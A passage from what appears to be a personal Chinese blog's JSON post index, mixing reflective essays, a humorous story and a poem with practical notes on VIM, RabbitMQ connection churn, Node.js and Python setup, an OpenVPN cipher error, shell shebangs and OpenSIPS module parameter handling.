但是当你刚开始使用VIM的时候,可能并没有安装什么插件,这时候你会有以下的一些困惑\n你用VIM打开一个文件后,怎么再打开一个文件呢?因为默认的VIM是没有文件浏览窗口的。你在GUI模式下养成的经验,在VIM上完全无法使用。你可能甚至不知道要怎么退出VIM。所有的一切都那么陌生。\n虚无感 VIM一般都运行在终端之上,给人感觉云里雾里,虚无缥缈。而编辑器就不同了,你看到的文件夹,打开的文件,对你来说就像是身上穿的衣服,手里搬的砖。终端呢,黑乎乎的,没啥颜色与图标,看起来那么不切实际,仿佛是天边的云彩,千变万化,无法琢磨。\n恐惧感 很多人可能做过那种梦,就是在梦里感觉自己在自由落体,然后惊醒。在你使用VIM的时候,可能也会有这种感觉。例如,一个文件我写了几百行了,万一ssh远程连接断了,或者说终端崩溃了,我写的文件会不会丢呢?为了安全起见,还是不用VIM吧。\n挫折感 使用VIM的时候,你必然要经历过很多困难,这些困难让你感觉到挫折,失去了继续学习的欲望。内心的另外一个人可能会说,我只想安安静静地做一个写代码的美男子,为什么要折腾这毫无颜值、难用的VIM呢?","title":"让你放弃VIM的一些原因"},{"content":"初中的时候,我曾经读过鲁滨逊漂流记,那时候这本书中最吸引我的是各种新奇的冒险体验,鲁滨逊接下来会遇到什么事情,是我最关注的事情。\n最近,我又开始读这本书了。是因为我感觉到很孤独,我不知道如何解决。我想,鲁滨逊一个人在一个荒岛上过了二十八年,他是如何面对孤独的呢?我想找到这个答案。\n写日记 小说中有不少的章节,都是鲁滨逊的日记。记录了他每天的工作和经历,通过写日志,他仿佛能够与自己对话。所以,有时候当我感到孤独的时候,我也写日记,把我的感想,我的困惑和烦恼统统写出来。对我自己来说,这也是一种释放。\n投身工作,制造产品,让自己忙活 除非生病或者下雨,鲁兵逊总是在不停的忙活着。\n收集葡萄,晒葡萄干 圈养小羊,让自己有充足的肉可以吃 种植大麦,自己制作面包 加固自己的房子 晒制陶土,制作陶器 环岛旅行 \u0026hellip; 鲁滨逊每天都在忙活着,每一天过得都非常有意义。我也觉得自己决不能浪费时间。\n找到自己的信仰 鲁滨逊在一次生病过程中,身体非常虚弱,当他回忆往事的时候,总觉得自己是个罪恶的人,无法得到谅解。但是偶然他得到一本《圣经》,他阅读圣经,从中找到自己的信仰。有信仰是非常幸福的事情,但是你若问我我的信仰是什么,我也不知道我的信仰是什么。\n这是最好的时代,也是最坏的时代。所有的人都觉得90后是压力最大的一代,90都神经也是最敏感的(腾讯张军的致敬青年,白岩松的“不会吧”)。我们承受着各种压力,其中最大的可能就是房价了。\n人生当中,自由自在可能仅仅是片刻的,承受压力却是主旋律。但是如何面对压力,却把人分成了不同的样子。有的人会被压力击垮,放弃抵抗,沉醉于各种网络精神鸦片中,有的人却能负重前行,坚持学习,一往无前。\n罗曼罗兰说过:这世上只有一种真正的英雄主义,就是认清生活的真相,并且任然热爱她。\n","permalink":"https://wdd.js.org/posts/2021/05/vzfo04/","summary":"初中的时候,我曾经读过鲁滨逊漂流记,那时候这本书中最吸引我的是各种新奇的冒险体验,鲁滨逊接下来会遇到什么事情,是我最关注的事情。\n最近,我又开始读这本书了。是因为我感觉到很孤独,我不知道如何解决。我想,鲁滨逊一个人在一个荒岛上过了二十八年,他是如何面对孤独的呢?我想找到这个答案。\n写日记 小说中有不少的章节,都是鲁滨逊的日记。记录了他每天的工作和经历,通过写日志,他仿佛能够与自己对话。所以,有时候当我感到孤独的时候,我也写日记,把我的感想,我的困惑和烦恼统统写出来。对我自己来说,这也是一种释放。\n投身工作,制造产品,让自己忙活 除非生病或者下雨,鲁兵逊总是在不停的忙活着。\n收集葡萄,晒葡萄干 圈养小羊,让自己有充足的肉可以吃 种植大麦,自己制作面包 加固自己的房子 晒制陶土,制作陶器 环岛旅行 \u0026hellip; 鲁滨逊每天都在忙活着,每一天过得都非常有意义。我也觉得自己决不能浪费时间。\n找到自己的信仰 鲁滨逊在一次生病过程中,身体非常虚弱,当他回忆往事的时候,总觉得自己是个罪恶的人,无法得到谅解。但是偶然他得到一本《圣经》,他阅读圣经,从中找到自己的信仰。有信仰是非常幸福的事情,但是你若问我我的信仰是什么,我也不知道我的信仰是什么。\n这是最好的时代,也是最坏的时代。所有的人都觉得90后是压力最大的一代,90都神经也是最敏感的(腾讯张军的致敬青年,白岩松的“不会吧”)。我们承受着各种压力,其中最大的可能就是房价了。\n人生当中,自由自在可能仅仅是片刻的,承受压力却是主旋律。但是如何面对压力,却把人分成了不同的样子。有的人会被压力击垮,放弃抵抗,沉醉于各种网络精神鸦片中,有的人却能负重前行,坚持学习,一往无前。\n罗曼罗兰说过:这世上只有一种真正的英雄主义,就是认清生活的真相,并且任然热爱她。","title":"再读鲁滨逊漂流记: 成年人如何面对孤独"},{"content":"魔女宅急便 琪琪 有点像花木兰 佐助 不认识 小樱 不认识 不认识 不认识 参考 https://designyoutrust.com/2021/04/person-uses-artificial-intelligence-to-make-anime-and-cartoon-characters-look-more-realistic/ ","permalink":"https://wdd.js.org/posts/2021/05/mfh46t/","summary":"魔女宅急便 琪琪 有点像花木兰 佐助 不认识 小樱 不认识 不认识 不认识 参考 https://designyoutrust.com/2021/04/person-uses-artificial-intelligence-to-make-anime-and-cartoon-characters-look-more-realistic/ ","title":"使用AI让卡通人物更加真实"},{"content":"连接抖动介绍 Workloads with high connection churn (a high rate of connections being opened and closed) will require TCP setting tuning to avoid exhaustion of certain resources: max number of file handles, Erlang processes on RabbitMQ nodes, kernel\u0026rsquo;s ephemeral port range (for hosts that open a lot of connections, including Federation links and Shovel connections), and others. Nodes that are exhausted of those resources won\u0026rsquo;t be able to accept new connections, which will negatively affect overall system availability.\n连接抖动,就是在单位时间内,有大量的连接产生,也同时有大量的连接关闭。这些抖动将会耗费大量的资源。\n从RabbitMq 3.7.9开始,引入了对抖动数据的统计。在mq管理界面上,可以看到下面的图标。\n下面是随时间变化,mq连接数的抖动情况。\nWhile connection and disconnection rates are system-specific, rates consistently above 100/second likely indicate a suboptimal connection management approach by one or more applications and usually are worth investigating.\n如果抖动的指标持续的超过每秒100个,这就需要引起注意了,需要调查下具体的抖动原因。\n抖动统计 抖动统计包括三个方面\nConnection Channel Queue 参考 https://www.rabbitmq.com/connections.html#high-connection-churn https://www.rabbitmq.com/networking.html#dealing-with-high-connection-churn https://vincent.bernat.ch/en/blog/2014-tcp-time-wait-state-linux https://www.rabbitmq.com/troubleshooting-networking.html#detecting-high-connection-churn ","permalink":"https://wdd.js.org/posts/2021/05/nr1shd/","summary":"连接抖动介绍 Workloads with high connection churn (a high rate of connections being opened and closed) will require TCP setting tuning to avoid exhaustion of certain resources: max number of file handles, Erlang processes on RabbitMQ nodes, kernel\u0026rsquo;s ephemeral port range (for hosts that open a lot of connections, including Federation links and Shovel connections), and others. Nodes that are exhausted of those resources won\u0026rsquo;t be able to accept new connections, which will negatively affect overall system availability.","title":"RabbitMq 大量的连接抖动"},{"content":"1. 选择安装包 访问 https://nodejs.org/en/download/ 选择Linux Binaries(x64) 2. 解压 下载后的文件是一个tar.xz的文件。\nxz -d node-xxxx.tar.zx // 解压xz tar -xvf node-xxxx.tar // 拿出文件夹 解压后的目录如下,其中\n➜ node-v14.17.0-linux-x64 ll total 600K drwxr-xr-x 2 wangdd staff 4.0K May 13 09:34 bin -rw-r--r-- 1 wangdd staff 469K May 12 02:14 CHANGELOG.md drwxr-xr-x 3 wangdd staff 4.0K May 13 09:34 include drwxr-xr-x 3 wangdd staff 4.0K May 13 09:34 lib -rw-r--r-- 1 wangdd staff 79K May 12 02:14 LICENSE -rw-r--r-- 1 wangdd staff 30K May 12 02:14 README.md drwxr-xr-x 5 wangdd staff 4.0K May 12 02:14 share // bin目录下就是nodejs的可执行程序 ➜ node-v14.17.0-linux-x64 ll bin total 71M -rwxr-xr-x 1 wangdd staff 71M May 12 02:14 node lrwxrwxrwx 1 wangdd staff 38 May 12 02:14 npm -\u0026gt; ../lib/node_modules/npm/bin/npm-cli.js lrwxrwxrwx 1 wangdd staff 38 May 12 02:14 npx -\u0026gt; ../lib/node_modules/npm/bin/npx-cli.js ➜ node-v14.17.0-linux-x64 ./bin/node --version v14.17.0 通过将bin目录加入到$PATH环境变量中这种方式,就可以直接调用node。\n","permalink":"https://wdd.js.org/fe/install-nodejs-offline/","summary":"1. 选择安装包 访问 https://nodejs.org/en/download/ 选择Linux Binaries(x64) 2. 解压 下载后的文件是一个tar.xz的文件。\nxz -d node-xxxx.tar.zx // 解压xz tar -xvf node-xxxx.tar // 拿出文件夹 解压后的目录如下,其中\n➜ node-v14.17.0-linux-x64 ll total 600K drwxr-xr-x 2 wangdd staff 4.0K May 13 09:34 bin -rw-r--r-- 1 wangdd staff 469K May 12 02:14 CHANGELOG.md drwxr-xr-x 3 wangdd staff 4.0K May 13 09:34 include drwxr-xr-x 3 wangdd staff 4.0K May 13 09:34 lib -rw-r--r-- 1 wangdd staff 79K May 12 02:14 LICENSE -rw-r--r-- 1 wangdd staff 30K May 12 02:14 README.","title":"离线安装nodejs"},{"content":"【我只会心疼哥哥(原视频)-哔哩哔哩】https://b23.tv/9YIMtp\n蓝天白云,晴空万里。路旁的电线杆笔挺的站着,有几只小鸟,在电线上蹦来蹦去,叫着闹着,空气中充了令人愉快的感觉。\n一辆白色雅迪冠能T5石墨烯72电池增程矩阵式大灯轻便型电动车自北向南,疾驰而过。\n车上坐着一男一女。少女扎着马尾辫,手中举着一根折叠式棒棒糖,笑靥如画,喃喃道:“哥哥,哥哥,你给我买这个,你女朋友知道了,不会生气吧?” 不等男生回答,她自顾自的先尝了一口。然后把棒棒糖举到男生嘴边,然后嘻嘻笑道:“真好吃,哥,你也尝一口”\n没有一个人瞧见这男生是怎么舔到棒棒糖的,但他的确尝了一口。\n少女睁大眼睛,张开嘴巴,惊讶的瞪着棒棒糖,又生气又害羞,仿佛怪自己不该那么鲁莽。她皎白的面颊已泛起了晕晕,在阳光下,放佛是一朵刚开的海棠, 娇嗔道:“哥哥,你女朋友要是知道我俩吃同一个棒棒糖,你女朋友不会吃醋吧?”\n“哥哥,你骑着小电动车,还带着我,你女朋友要是知道了,不会打我吧”\n“好可怕!你女朋友!”\n少女用眼角瞟着男生,黯然道:“你女朋过不像我,我只会心疼哥哥。”\n","permalink":"https://wdd.js.org/posts/2021/05/rhan2i/","summary":"【我只会心疼哥哥(原视频)-哔哩哔哩】https://b23.tv/9YIMtp\n蓝天白云,晴空万里。路旁的电线杆笔挺的站着,有几只小鸟,在电线上蹦来蹦去,叫着闹着,空气中充了令人愉快的感觉。\n一辆白色雅迪冠能T5石墨烯72电池增程矩阵式大灯轻便型电动车自北向南,疾驰而过。\n车上坐着一男一女。少女扎着马尾辫,手中举着一根折叠式棒棒糖,笑靥如画,喃喃道:“哥哥,哥哥,你给我买这个,你女朋友知道了,不会生气吧?” 不等男生回答,她自顾自的先尝了一口。然后把棒棒糖举到男生嘴边,然后嘻嘻笑道:“真好吃,哥,你也尝一口”\n没有一个人瞧见这男生是怎么舔到棒棒糖的,但他的确尝了一口。\n少女睁大眼睛,张开嘴巴,惊讶的瞪着棒棒糖,又生气又害羞,仿佛怪自己不该那么鲁莽。她皎白的面颊已泛起了晕晕,在阳光下,放佛是一朵刚开的海棠, 娇嗔道:“哥哥,你女朋友要是知道我俩吃同一个棒棒糖,你女朋友不会吃醋吧?”\n“哥哥,你骑着小电动车,还带着我,你女朋友要是知道了,不会打我吧”\n“好可怕!你女朋友!”\n少女用眼角瞟着男生,黯然道:“你女朋过不像我,我只会心疼哥哥。”","title":"用古龙的手法 写我只会心疼哥哥"},{"content":"python3 wave.py Traceback (most recent call last): File \u0026#34;wave.py\u0026#34;, line 3, in \u0026lt;module\u0026gt; import matplotlib.pyplot as plt ModuleNotFoundError: No module named \u0026#39;matplotlib\u0026#39; 这种问题一般有两个原因\n这个第三方的包本地的确没有安装,解决方式就是安装这个包 这个包安装了,但是因为环境配置或者其他问题,导致找不到正确的路径 问题1: 本地有没有安装过matplotlib? 下面的命令的输出说明已经安装了matplotlib, 并且目录是\n/usr/local/lib/python3.9/site-packages pip3 show matplotlib Name: matplotlib Version: 3.4.1 Summary: Python plotting package Home-page: https://matplotlib.org Author: John D. Hunter, Michael Droettboom Author-email: matplotlib-users@python.org License: PSF Location: /usr/local/lib/python3.9/site-packages Requires: pillow, python-dateutil, pyparsing, numpy, kiwisolver, cycler Required-by: 问题2: python3运行的那个版本的python? 由于历史原因,python的版本非常多,电脑上可能安装了多个python的版本。\n下面的命令说明,python3实际执行的的是python 3.8.2,搜索的路径也是3.8的。但是pip3安装的第三方包,是在python3.9的目录下。\n➜ bin python3 Python 3.8.2 (default, Dec 21 2020, 15:06:04) [Clang 12.0.0 (clang-1200.0.32.29)] on darwin Type \u0026#34;help\u0026#34;, \u0026#34;copyright\u0026#34;, \u0026#34;credits\u0026#34; or \u0026#34;license\u0026#34; for more information. \u0026gt;\u0026gt;\u0026gt; import sys \u0026gt;\u0026gt;\u0026gt; print(sys.path) [\u0026#39;\u0026#39;, \u0026#39;/Library/Developer/CommandLineTools/Library/Frameworks/Python3.framework/Versions/3.8/lib/python38.zip\u0026#39;, \u0026#39;/Library/Developer/CommandLineTools/Library/Frameworks/Python3.framework/Versions/3.8/lib/python3.8\u0026#39;, \u0026#39;/Library/Developer/CommandLineTools/Library/Frameworks/Python3.framework/Versions/3.8/lib/python3.8/lib-dynload\u0026#39;, \u0026#39;/Library/Developer/CommandLineTools/Library/Frameworks/Python3.framework/Versions/3.8/lib/python3.8/site-packages\u0026#39;] ➜ pip3 -V pip 21.0.1 from /usr/local/lib/python3.9/site-packages/pip (python 3.9) 问题3: python3.9在哪? 通过上面的命令,就说了我的电脑上有python3.9, 那么实际要克制行文件在哪里呢?\n一般我是用brew安装软件的,brew list\nbrew list - python@3.9 brew info python@3.9 Python has been installed as /usr/local/bin/python3 Unversioned symlinks `python`, `python-config`, `pip` etc. pointing to `python3`, `python3-config`, `pip3` etc., respectively, have been installed into /usr/local/opt/python@3.9/libexec/bin 上面的输出中,有两个路径\n/usr/local/bin/python3 试了下这个路径没有文件 /usr/local/opt/python@3.9/libexec/bin 这个文件存在 ➜ bin /usr/local/opt/python@3.9/libexec/bin/python -V Python 3.9.2 将python3 设置为一个别名\nalias python3=\u0026#39;/usr/local/opt/python@3.9/libexec/bin/python\u0026#39; source ~/.zshrc\npython3 wave.py,\n问题解决。\n","permalink":"https://wdd.js.org/posts/2021/05/blzt8r/","summary":"python3 wave.py Traceback (most recent call last): File \u0026#34;wave.py\u0026#34;, line 3, in \u0026lt;module\u0026gt; import matplotlib.pyplot as plt ModuleNotFoundError: No module named \u0026#39;matplotlib\u0026#39; 这种问题一般有两个原因\n这个第三方的包本地的确没有安装,解决方式就是安装这个包 这个包安装了,但是因为环境配置或者其他问题,导致找不到正确的路径 问题1: 本地有没有安装过matplotlib? 下面的命令的输出说明已经安装了matplotlib, 并且目录是\n/usr/local/lib/python3.9/site-packages pip3 show matplotlib Name: matplotlib Version: 3.4.1 Summary: Python plotting package Home-page: https://matplotlib.org Author: John D. Hunter, Michael Droettboom Author-email: matplotlib-users@python.org License: PSF Location: /usr/local/lib/python3.9/site-packages Requires: pillow, python-dateutil, pyparsing, numpy, kiwisolver, cycler Required-by: 问题2: python3运行的那个版本的python? 由于历史原因,python的版本非常多,电脑上可能安装了多个python的版本。\n下面的命令说明,python3实际执行的的是python 3.8.2,搜索的路径也是3.8的。但是pip3安装的第三方包,是在python3.9的目录下。\n➜ bin python3 Python 3.","title":"python ModuleNotFoundError"},{"content":" 人生是一场仅与时间为伴的孤独修行\nA《鲁宾逊漂流记》 B《一日看尽长安花》 C《被讨厌的勇气》 D《围城》 E《牛津通识读本 数学》 5.10 11 12 13 14 15 16 17 18 19 鲁滨逊漂流记 3 6 9 20 被讨厌的勇气 20 25 30 36 围城 6 10 11 13 牛津通识读本 数学 5 8 10 19 一日看尽长安花 15 20 24 35 ","permalink":"https://wdd.js.org/posts/2021/05/appxev/","summary":" 人生是一场仅与时间为伴的孤独修行\nA《鲁宾逊漂流记》 B《一日看尽长安花》 C《被讨厌的勇气》 D《围城》 E《牛津通识读本 数学》 5.10 11 12 13 14 15 16 17 18 19 鲁滨逊漂流记 3 6 9 20 被讨厌的勇气 20 25 30 36 围城 6 10 11 13 牛津通识读本 数学 5 8 10 19 一日看尽长安花 15 20 24 35 ","title":"5月书单"},{"content":"2021-01-19 12:01:58 OPTIONS ERROR: failed to negotiate cipher with server. Add the server\u0026#39;s cipher (\u0026#39;BF-CBC\u0026#39;) to --data-ciphers (currently \u0026#39;AES-256-GCM:AES-128-GCM\u0026#39;) if you want to connect to this server. 2021-01-19 12:01:58 ERROR: Failed to apply push options 2021-01-19 12:01:58 Failed to open tun/tap interface 解决办法:在配置文件中增加一行\nncp-ciphers \u0026#34;BF-CBC\u0026#34; PS: 今天是我的生日,QQ邮箱又是第一个发来祝福的 苦笑.jpg\n","permalink":"https://wdd.js.org/posts/2021/05/kakgg7/","summary":"2021-01-19 12:01:58 OPTIONS ERROR: failed to negotiate cipher with server. Add the server\u0026#39;s cipher (\u0026#39;BF-CBC\u0026#39;) to --data-ciphers (currently \u0026#39;AES-256-GCM:AES-128-GCM\u0026#39;) if you want to connect to this server. 2021-01-19 12:01:58 ERROR: Failed to apply push options 2021-01-19 12:01:58 Failed to open tun/tap interface 解决办法:在配置文件中增加一行\nncp-ciphers \u0026#34;BF-CBC\u0026#34; PS: 今天是我的生日,QQ邮箱又是第一个发来祝福的 苦笑.jpg","title":"openvpn 报错"},{"content":"我小时候曾去过成都,那时候还没有高速公路,而是九曲回肠的盘山公路。路的一边是看不到底悬崖,另一边上接近90度的峭壁。在峭壁之上,有很多巨石,摇摇欲坠,十分吓人。\n深夜时分,车灯蔓延处,连起来放佛是一条天路。\n从成都回来的时候,我写下这个小诗,匆匆十年,桃花依旧,物是人非。曾经梦想中的的那个遥远的未来,已然近在咫尺。然而这首小诗,却从未忘记。\n灯光随血液而流动心跳伴坎坷而起伏极目远眺想看见路的时候蓦然回首路的尽头心里头\n","permalink":"https://wdd.js.org/posts/2021/04/gbx6x5/","summary":"我小时候曾去过成都,那时候还没有高速公路,而是九曲回肠的盘山公路。路的一边是看不到底悬崖,另一边上接近90度的峭壁。在峭壁之上,有很多巨石,摇摇欲坠,十分吓人。\n深夜时分,车灯蔓延处,连起来放佛是一条天路。\n从成都回来的时候,我写下这个小诗,匆匆十年,桃花依旧,物是人非。曾经梦想中的的那个遥远的未来,已然近在咫尺。然而这首小诗,却从未忘记。\n灯光随血液而流动心跳伴坎坷而起伏极目远眺想看见路的时候蓦然回首路的尽头心里头","title":"不曾忘的一首小诗"},{"content":"今天在写一个shell脚本的时候,遇到一个奇怪的报错,说我的脚本有语法错误。\nif [ $1 == $2 ]; then echo ok else echo not ok fi 编译器的报错是说if语句是有问题的,但是我核对了好久遍,也看了网上的例子,发现没什么毛病。\n我自己看了几分钟,还是看不出所以然来。然后我就找了一位同事帮我看看,首先我给他解释了一遍我的脚本是如何工作的,说着说着,他还在思考的时候。我突然发现,我知道原因了。\n这个shell脚本是我从另一个脚本里拷贝的。脚本的第一行是\n#!/bin/sh 原因就在与第一行的这条语句。\n一般情况下我们都是写得/bin/bash, 但是在拷贝的时候,我没有考虑到这个。实际在我的电脑上/bin/sh很可能不是bash, 而是zsh,zsh的语法和bash的语法是不一样的。所以会抱语法错误\n#!/bin/bash 这就是典型的一叶障目,不见泰山。 我觉得我需要买个小黄鸭,在遇到的难以解决的问题时,抽丝剥茧的解释给它听。\n经过这件事情后,我也想到了今天刚学到的一个概念。叫做费曼学习法,据说是很牛逼的学习法,可以非常快的学习一门知识。\n简单介绍一下费曼学习法:\n选择一个你要学学习的概念,写在本子上 假装你要把这个概念教会别人 你一定会某些地方卡壳的,当你卡壳的时候,就立即回去看书 简化你的语言,目的是用你自己的语言,解释某个概念,如果你依然还是有些困惑,那说明你还是不够了解这个概念。 费曼曾获得诺贝尔奖,所以上他不是个简单的人。费曼的老师叫惠勒,费曼的学习方法很可能收到惠勒的影响。\n惠勒常常说:人只有教别人的时候,才能学到更多。\nAnother favorite Wheelerism is \u0026ldquo;one can only learn by teaching. 惠勒主义\n惠勒还有一句名言:\n去恨就是是学习,去学习是去理解,去理解是去欣赏,去欣赏则是去爱,也许你会爱上你的理论。,\nTo hate is to study, to study is to understand, to understand is to appreciate, to appreciate is to love. So maybe I\u0026rsquo;ll end up loving your theory. \u0026ndash; Wheeler\n总之,我们如果在学习时能够把知识传授给别人,对自己来说也是一种学习。\n参考 https://www.zhihu.com/question/20576786 https://baike.baidu.com/item/%E8%B4%B9%E6%9B%BC%E5%AD%A6%E4%B9%A0%E6%B3%95/50895393 https://www.quora.com/Learning-New-Things/How-can-you-learn-faster/answer/Acaz-Pereira https://www.scientificamerican.com/article/pioneering-physicist-john-wheeler-dies/ ","permalink":"https://wdd.js.org/posts/2021/04/zl6rpy/","summary":"今天在写一个shell脚本的时候,遇到一个奇怪的报错,说我的脚本有语法错误。\nif [ $1 == $2 ]; then echo ok else echo not ok fi 编译器的报错是说if语句是有问题的,但是我核对了好久遍,也看了网上的例子,发现没什么毛病。\n我自己看了几分钟,还是看不出所以然来。然后我就找了一位同事帮我看看,首先我给他解释了一遍我的脚本是如何工作的,说着说着,他还在思考的时候。我突然发现,我知道原因了。\n这个shell脚本是我从另一个脚本里拷贝的。脚本的第一行是\n#!/bin/sh 原因就在与第一行的这条语句。\n一般情况下我们都是写得/bin/bash, 但是在拷贝的时候,我没有考虑到这个。实际在我的电脑上/bin/sh很可能不是bash, 而是zsh,zsh的语法和bash的语法是不一样的。所以会抱语法错误\n#!/bin/bash 这就是典型的一叶障目,不见泰山。 我觉得我需要买个小黄鸭,在遇到的难以解决的问题时,抽丝剥茧的解释给它听。\n经过这件事情后,我也想到了今天刚学到的一个概念。叫做费曼学习法,据说是很牛逼的学习法,可以非常快的学习一门知识。\n简单介绍一下费曼学习法:\n选择一个你要学学习的概念,写在本子上 假装你要把这个概念教会别人 你一定会某些地方卡壳的,当你卡壳的时候,就立即回去看书 简化你的语言,目的是用你自己的语言,解释某个概念,如果你依然还是有些困惑,那说明你还是不够了解这个概念。 费曼曾获得诺贝尔奖,所以上他不是个简单的人。费曼的老师叫惠勒,费曼的学习方法很可能收到惠勒的影响。\n惠勒常常说:人只有教别人的时候,才能学到更多。\nAnother favorite Wheelerism is \u0026ldquo;one can only learn by teaching. 惠勒主义\n惠勒还有一句名言:\n去恨就是是学习,去学习是去理解,去理解是去欣赏,去欣赏则是去爱,也许你会爱上你的理论。,\nTo hate is to study, to study is to understand, to understand is to appreciate, to appreciate is to love. So maybe I\u0026rsquo;ll end up loving your theory.","title":"从/bin/sh到费曼学习法"},{"content":"写过opensips脚本的同学,往往对函数的传参感到困惑。\n例如:\nds_select_dst()可以接受整数或者值为正数的变量作为第一个参数,但是nat_uac_test()的第一个参数就只能是整数,而不能是变量 为什么rl_check()可以接受格式化的字符串,而save()只能接受字符串。 为什么ds_select_dst(\u0026quot;1\u0026quot;, \u0026quot;4\u0026quot;) 作为整数也要加上双引号? 为什么变量要加上双引号? ds_select_dst(\u0026quot;$var(aa)\u0026quot;, \u0026quot;4\u0026quot;) 为什么t_on_branch(\u0026quot;1\u0026quot;)路由的钩子要加上双引号? 为什么route(go_to_something);这里又不需要加上引号? ds_select_dst(\u0026#34;1\u0026#34;, \u0026#34;0\u0026#34;); $var(aa)=1; ds_select_dst(\u0026#34;$var(aa)\u0026#34;, \u0026#34;0\u0026#34;); rl_check(\u0026#34;gw_$ru\u0026#34;, \u0026#34;$var(limit)\u0026#34;); #格式化的gw_$ru save(\u0026#34;location\u0026#34;); #单纯的字符串作为参数 从3.0开始,传参可以更加自然。\n整数可以直接传参,不用加双引号 do_something(1, 1); 输入或者输出的$var(), 不用加双引号,加了反而会报错 do_something($var(a), $var(b)); 格式化字符串,需要加双引号 do_something(1, \u0026#34;$var(bb)_$var(b)\u0026#34;); 参考 https://blog.opensips.org/2019/11/05/the-module-function-interface-rework-in-opensips-3-0/ https://www.opensips.org/Documentation/Script-Syntax-3-0# ","permalink":"https://wdd.js.org/opensips/ch8/fork/","summary":"写过opensips脚本的同学,往往对函数的传参感到困惑。\n例如:\nds_select_dst()可以接受整数或者值为正数的变量作为第一个参数,但是nat_uac_test()的第一个参数就只能是整数,而不能是变量 为什么rl_check()可以接受格式化的字符串,而save()只能接受字符串。 为什么ds_select_dst(\u0026quot;1\u0026quot;, \u0026quot;4\u0026quot;) 作为整数也要加上双引号? 为什么变量要加上双引号? ds_select_dst(\u0026quot;$var(aa)\u0026quot;, \u0026quot;4\u0026quot;) 为什么t_on_branch(\u0026quot;1\u0026quot;)路由的钩子要加上双引号? 为什么route(go_to_something);这里又不需要加上引号? ds_select_dst(\u0026#34;1\u0026#34;, \u0026#34;0\u0026#34;); $var(aa)=1; ds_select_dst(\u0026#34;$var(aa)\u0026#34;, \u0026#34;0\u0026#34;); rl_check(\u0026#34;gw_$ru\u0026#34;, \u0026#34;$var(limit)\u0026#34;); #格式化的gw_$ru save(\u0026#34;location\u0026#34;); #单纯的字符串作为参数 从3.0开始,传参可以更加自然。\n整数可以直接传参,不用加双引号 do_something(1, 1); 输入或者输出的$var(), 不用加双引号,加了反而会报错 do_something($var(a), $var(b)); 格式化字符串,需要加双引号 do_something(1, \u0026#34;$var(bb)_$var(b)\u0026#34;); 参考 https://blog.opensips.org/2019/11/05/the-module-function-interface-rework-in-opensips-3-0/ https://www.opensips.org/Documentation/Script-Syntax-3-0# ","title":"模块传参的重构"},{"content":" sbc_100rel.pdf\n在fs中配置:\nenable-100rel 设置为true ➜ fs-conf ack 100rel sip_profiles/internal.xml 112: There are known issues (asserts and segfaults) when 100rel is enabled. 113: It is not recommended to enable 100rel at this time. 115: \u0026lt;!--\u0026lt;param name=\u0026#34;enable-100rel\u0026#34; value=\u0026#34;true\u0026#34;/\u0026gt;--\u0026gt; sip_profiles/external-ipv6.xml 36: \u0026lt;!--\u0026lt;param name=\u0026#34;enable-100rel\u0026#34; value=\u0026#34;true\u0026#34;/\u0026gt;--\u0026gt; sip_profiles/internal-ipv6.xml 27: \u0026lt;!--\u0026lt;param name=\u0026#34;enable-100rel\u0026#34; value=\u0026#34;false\u0026#34;/\u0026gt;--\u0026gt; sip_profiles/external.xml 36: \u0026lt;!--\u0026lt;param name=\u0026#34;enable-100rel\u0026#34; value=\u0026#34;true\u0026#34;/\u0026gt;--\u0026gt; enable-100rel This enable support for 100rel (100% reliability - PRACK message as defined inRFC3262) This fixes a problem with SIP where provisional messages like \u0026ldquo;180 Ringing\u0026rdquo; are not ACK\u0026rsquo;d and therefore could be dropped over a poor connection without retransmission. 2009-07-08: Enabling this may cause FreeSWITCH to crash, seeFSCORE-392.\n参考 http://lists.freeswitch.org/pipermail/freeswitch-users/2018-April/129473.html https://freeswitch.org/confluence/display/FREESWITCH/Sofia+Configuration+Files https://tools.ietf.org/html/draft-ietf-sip-100rel-02 https://nickvsnetworking.com/sip-extensions-100rel-sip-rfc3262/ ","permalink":"https://wdd.js.org/opensips/ch9/100-rel/","summary":"sbc_100rel.pdf\n在fs中配置:\nenable-100rel 设置为true ➜ fs-conf ack 100rel sip_profiles/internal.xml 112: There are known issues (asserts and segfaults) when 100rel is enabled. 113: It is not recommended to enable 100rel at this time. 115: \u0026lt;!--\u0026lt;param name=\u0026#34;enable-100rel\u0026#34; value=\u0026#34;true\u0026#34;/\u0026gt;--\u0026gt; sip_profiles/external-ipv6.xml 36: \u0026lt;!--\u0026lt;param name=\u0026#34;enable-100rel\u0026#34; value=\u0026#34;true\u0026#34;/\u0026gt;--\u0026gt; sip_profiles/internal-ipv6.xml 27: \u0026lt;!--\u0026lt;param name=\u0026#34;enable-100rel\u0026#34; value=\u0026#34;false\u0026#34;/\u0026gt;--\u0026gt; sip_profiles/external.xml 36: \u0026lt;!--\u0026lt;param name=\u0026#34;enable-100rel\u0026#34; value=\u0026#34;true\u0026#34;/\u0026gt;--\u0026gt; enable-100rel This enable support for 100rel (100% reliability - PRACK message as defined inRFC3262) This fixes a problem with SIP where provisional messages like \u0026ldquo;180 Ringing\u0026rdquo; are not ACK\u0026rsquo;d and therefore could be dropped over a poor connection without retransmission.","title":"sbc 100rel"},{"content":"假如一个模块暴露了一个函数,叫做do_something(), 仅支持传递一个参数。这个函数在c文件中对应w_do_something()\n// 在opensips.cfg文件中 route{ do_something(\u0026#34;abc\u0026#34;) } static int w_do_something(struct sip_msg* msg, char* str1){ // 在c文件中,我们打印str1的值,这个字符串就是abc } // 在opensips.cfg文件中 route{ $var(num)=\u0026#34;abc\u0026#34;; do_something(\u0026#34;$var(num)\u0026#34;) } static int w_do_something(struct sip_msg* msg, char* str1){ // 在c文件中,我们打印str1的值,这个字符串就是$var(num) // 这时候就有问题了,其实我们想获取的是$var(num)的值abc, 而不是字符串$var(num) } 那怎么获取$var()的传参的值呢?这里就需要用到了函数的fixup_函数。\nstatic cmd_export_t cmds[]={ {\u0026#34;find_zone_code\u0026#34;, (cmd_function)w_do_something, 2, fixup_do_something, 0, REQUEST_ROUTE}, {0,0,0,0,0,0} }; // 调用fixup_spve, 只有在fixup函数中,对函数的参数执行了fixup, 在真正的执行函数中,才能得到真正的$var()的值 static int fixup_do_something(void** param, int param_no) { LM_INFO(\u0026#34;fixup_find_zone_code: param: %s param_no: %d\\n\u0026#34;, (char *)*param, param_no); return fixup_spve(param); } static int w_do_something (struct sip_msg* msg, char* str1){ str zone; if (fixup_get_svalue(msg, (gparam_p)str1, \u0026amp;zone) != 0) { LM_WARN(\u0026#34;cannot find the phone!\\n\u0026#34;); return -1; } LM_INFO(\u0026#34;zone:%s\\n\u0026#34;, zone.s); return 1; } 